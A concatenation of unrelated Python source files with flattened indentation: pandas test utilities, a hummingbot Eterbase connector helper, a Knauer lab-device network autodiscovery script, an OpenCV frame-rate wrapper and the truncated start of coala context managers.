return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}.get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# pandas\_testing.py:2148: error: Need type annotation for 'cnt'
cnt = Counter() # type: ignore[var-annotated]
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "density" [misc]
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "random_state" [misc]
i, j = _create_missing_idx( # type: ignore[misc]
*df.shape, density=density, random_state=random_state
)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
# pandas\_testing.py:2331: error: Incompatible types in assignment
# (expression has type "List[<nothing>]", variable has type
# "Tuple[Any, ...]")
args = [] # type: ignore[assignment]
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
# pandas\_testing.py:2521: error: "Exception" has no attribute
# "reason"
errno = getattr(err.reason, "errno", None) # type: ignore[attr-defined]
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
eterbase_utils.py
|
import logging
from typing import Dict, Any, Optional, Tuple, List
import hummingbot.connector.exchange.eterbase.eterbase_constants as constants
from hummingbot.connector.exchange.eterbase.eterbase_auth import EterbaseAuth
from hummingbot.client.config.config_var import ConfigVar
from hummingbot.client.config.config_methods import using_exchange
import aiohttp
import asyncio
import json
from threading import Thread
_eu_logger = logging.getLogger(__name__)
shared_client = None
marketid_map = None
API_CALL_TIMEOUT = 10.0
CENTRALIZED = True
EXAMPLE_PAIR = "EUR-ETH"
DEFAULT_FEES = [0.35, 0.35]
async def _http_client(loop: Optional = None) -> aiohttp.ClientSession:
"""
:returns: Shared client session instance
"""
# calling API from different thread
if loop is not None:
return aiohttp.ClientSession(loop = loop)
# calling API fro main thread
global shared_client
if shared_client is None:
shared_client = aiohttp.ClientSession()
return shared_client
async def api_request(http_method: str,
path_url: str = None,
url: str = None,
data: Optional[Dict[str, Any]] = None,
auth: Optional[EterbaseAuth] = None,
loop: Optional = None) -> Dict[str, Any]:
"""
A wrapper for submitting API requests to Eterbase
:returns: json data from the endpoints
"""
assert path_url is not None or url is not None
url = f"{constants.REST_URL}{path_url}" if url is None else url
data_str = None
if data is not None:
data_str = json.dumps(data)
_eu_logger.debug(f"Request: url: {url}")
_eu_logger.debug(f"Request: data: {data_str}")
headers = {}
if auth is not None:
headers = auth.get_headers(http_method, url, data_str)
if data is not None:
headers['Content-Type'] = "application/json"
client = await _http_client(loop)
async with client.request(http_method,
url=url,
timeout=API_CALL_TIMEOUT,
data=data_str,
headers=headers) as response:
data = None
data = await response.text()
_eu_logger.debug(f"Response text data: '{data}'."[:400])
if len(data) > 0:
try:
data = json.loads(data)
except ValueError:
_eu_logger.info(f"Response is not a json text: '{data}'."[:400])
if (response.status != 200) and (response.status != 204):
raise IOError(f"Error fetching data from {url}. HTTP status is {response.status}. {data}", response.status)
return data
def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
loop.run_forever()
def get_marketid_mapping() -> Dict[int, str]:
global marketid_map
if (marketid_map is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
marketid_map = dict()
for market in markets:
marketid = market.get("id")
if marketid not in marketid_map.keys():
trad_pair = market.get("symbol")
marketid_map[marketid] = trad_pair
return marketid_map
trading_pairs_split = None
def prepare_trading_pairs_split(markets: List):
global trading_pairs_split
if trading_pairs_split is None:
trading_pairs_split = dict()
for market in markets:
trad_pair = market.get("symbol")
if trad_pair not in trading_pairs_split:
base = market.get("base")
quote = market.get("quote")
trading_pairs_split[trad_pair] = {"base": base, "quote": quote}
def split_trading_pair(trading_pair: str) -> Tuple[str, str]:
global trading_pairs_split
if (trading_pairs_split is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
prepare_trading_pairs_split(markets)
try:
market = trading_pairs_split[trading_pair]
base_asset = market['base']
quote_asset = market['quote']
return base_asset, quote_asset
except Exception:
raise ValueError(f"Error parsing trading_pair {trading_pair}", exc_info=True)
def convert_to_exchange_trading_pair(hb_trading_pair: str) -> str:
return hb_trading_pair.replace("-", "")
def convert_from_exchange_trading_pair(trading_pair: str) -> str:
base, quote = split_trading_pair(trading_pair)
return f"{base}-{quote}"
KEYS = {
"eterbase_api_key":
ConfigVar(key="eterbase_api_key",
prompt="Enter your Eterbase API key >>> ",
required_if=using_exchange("eterbase"),
is_secure=True,
is_connect_key=True),
"eterbase_secret_key":
ConfigVar(key="eterbase_secret_key",
prompt="Enter your Eterbase secret key >>> ",
required_if=using_exchange("eterbase"),
is_secure=True,
is_connect_key=True),
"eterbase_account":
ConfigVar(key="eterbase_account",
prompt="Enter your Eterbase account >>> ",
required_if=using_exchange("eterbase"),
is_secure=True,
is_connect_key=True),
}
|
Knauer_autodiscover.py
|
""" Autodiscover Knauer devices on network """
import asyncio
import queue
import socket
import sys
import time
from threading import Thread
from typing import Dict, Text, Tuple, Union
from getmac import getmac
from loguru import logger
Address = Tuple[str, int]
class BroadcastProtocol(asyncio.DatagramProtocol):
"""From https://gist.github.com/yluthu/4f785d4546057b49b56c"""
def __init__(self, target: Address, response_queue: queue.Queue):
self.target = target
self.loop = asyncio.get_event_loop()
self._queue = response_queue
def connection_made(self, transport: asyncio.transports.DatagramTransport): # type: ignore
"""Called upon connection."""
sock = transport.get_extra_info("socket") # type: socket.socket
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # sets to broadcast
transport.sendto(b"\x00\x01\x00\xf6", self.target)
def datagram_received(self, data: Union[bytes, Text], addr: Address):
"""Called on data received"""
logger.trace(f"Received data from {addr}")
self._queue.put(addr[0])
async def get_device_type(ip_address: str) -> str:
"""Returns either 'Pump', 'Valve' or 'Unknown'"""
fut = asyncio.open_connection(host=ip_address, port=10001)
try:
reader, writer = await asyncio.wait_for(fut, timeout=3)
except ConnectionError:
return "ConnectionError"
except asyncio.TimeoutError:
if ip_address == "192.168.1.2":
return "TimeoutError - Nice FlowIR that you have :D"
return "TimeoutError"
# Test Pump
writer.write("HEADTYPE:?\n\r".encode())
reply = await reader.readuntil(separator=b"\r")
if reply.startswith(b"HEADTYPE"):
logger.debug(f"Device {ip_address} is a Pump")
return "Pump"
# Test Valve
writer.write("T:?\n\r".encode())
reply = await reader.readuntil(separator=b"\r")
if reply.startswith(b"VALVE"):
logger.debug(f"Device {ip_address} is a Valve")
return "Valve"
return "Unknown"
def autodiscover_knauer(source_ip: str = "") -> Dict[str, str]:
"""
Automatically find Knauer ethernet device on the network and returns the IP associated to each MAC address.
Note that the MAC is the key here as it is the parameter used in configuration files.
Knauer devices only support DHCP so static IPs are not an option.
Args:
source_ip: source IP for autodiscover (only relevant if multiple network interfaces are available!)
Returns:
List of tuples (IP, MAC, device_type), one per device replying to autodiscover
"""
# Define source IP resolving local hostname.
if not source_ip:
hostname = socket.gethostname()
source_ip = socket.gethostbyname(hostname)
loop = asyncio.get_event_loop()
device_q: queue.Queue = queue.Queue()
coro = loop.create_datagram_endpoint(
lambda: BroadcastProtocol(("255.255.255.255", 30718), response_queue=device_q),
local_addr=(source_ip, 28688),
)
loop.run_until_complete(coro)
thread = Thread(target=loop.run_forever)
thread.start()
time.sleep(2)
loop.call_soon_threadsafe(loop.stop) # here
thread.join()
device_list = []
for _ in range(40):
try:
device_list.append(device_q.get_nowait())
except queue.Empty:
break
device_info = dict()
for device_ip in device_list:
# MAC address
mac = getmac.get_mac_address(ip=device_ip)
device_info[mac] = device_ip
return device_info
if __name__ == "__main__":
# This is a bug of asyncio on Windows :|
if sys.platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
# Autodiscover devices (dict mac as index, IP as value)
devices = autodiscover_knauer()
for mac_address, ip in devices.items():
# Device Type
device_type = asyncio.run(get_device_type(ip))
print(f"MAC: {mac_address} IP: {ip} DEVICE_TYPE: {device_type}")
|
videocv.py
|
#!/usr/bin/env python2
import time
import cv2
from threading import Thread
class Videocv():
"""
Ensures constant frame rates for the CV2 video input.
"""
def __init__(self, src=0, fps=30):
self.fps = float(fps)
self._vc = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self._vc.read()
self.ended = False
def run(self):
Thread(target=self.get, args=()).start()
return
def get(self):
while not self.ended:
time.sleep(1/self.fps)
if not self.grabbed:
self.stop()
else:
(self.grabbed, self.frame) = self._vc.read()
def stop(self):
self.ended = True
|
ContextManagers.py
|
import builtins
import os
import platform
import signal
import sys
import threading
from contextlib import closing, contextmanager
from io import StringIO
from coala_utils.MutableValue import MutableValue
from coala_utils.FileUtils import create_tempfile
@contextmanager
def subprocess_timeout(sub_process, seconds, kill_pg=False):
"""
Kill subprocess if the sub process takes more the than the timeout.
:param sub_process: The sub process to run.
:param seconds: The number of seconds to allow the test to run for. If
set to 0 or a negative value, it waits indefinitely.
Floats can be used to specify units smaller than
seconds.
:param kill_pg: Boolean whether to kill the process group or only this
process. (not applicable for windows)
"""
timedout = MutableValue(False)
if seconds <= 0:
yield timedout
return
finished = threading.Event()
if platform.system() == "Windows": # pragma: no cover
kill_pg = False
def kill_it():
finished.wait(seconds)
if not finished.is_set():
timedout.value = True
if kill_pg:
pgid = os.getpgid(sub_process.pid)
os.kill(sub_process.pid, signal.SIGINT)
if kill_pg:
os.killpg(pgid, signal.SIGINT)
thread = threading.Thread(name='timeout-killer', target=kill_it)
try:
thread.start()
yield timedout
finally:
finished.set()
thread.join()
@contextmanager
def replace_stdout(replacement):
"""
Replaces stdout with the replacement, yields back to the caller and then
reverts everything back.
"""
_stdout = sys.stdout
sys.stdout = replacement
try:
yield
finally:
sys.stdout = _stdout
@contextmanager
def replace_stderr(replacement):
"""
Replaces stderr with the replacement, yields back to the caller and then
reverts everything back.
"""
_stderr = sys.stderr
sys.stderr = replacement
try:
yield
finally:
sys.stderr = _stderr
@contextmanager
def suppress_stdout():
"""
Suppresses everything going to stdout.
"""
with open(os.devnull, "w") as devnull, replace_stdout(devnull):
yield
@contextmanager
def retrieve_stdout():
"""
Yields a StringIO object from which one can read everything that was
printed to stdout. (It won't be printed to the real stdout!)
Example usage:
with retrieve_stdout() as stdout:
print("something") # Won't print to the console
what_was_printed = stdout.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stdout(sio):
oldprint = builtins.print
try:
# Overriding stdout doesn't work with libraries, this ensures even
# cached variables take this up. Well... it works.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def retrieve_stderr():
"""
Yields a StringIO object from which one can read everything that was
printed to stderr. (It won't be printed to the real stderr!)
Example usage:
with retrieve_stderr() as stderr:
print("something") # Won't print to the console
what_was_printed = stderr.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stderr(sio):
oldprint = builtins.print
try:
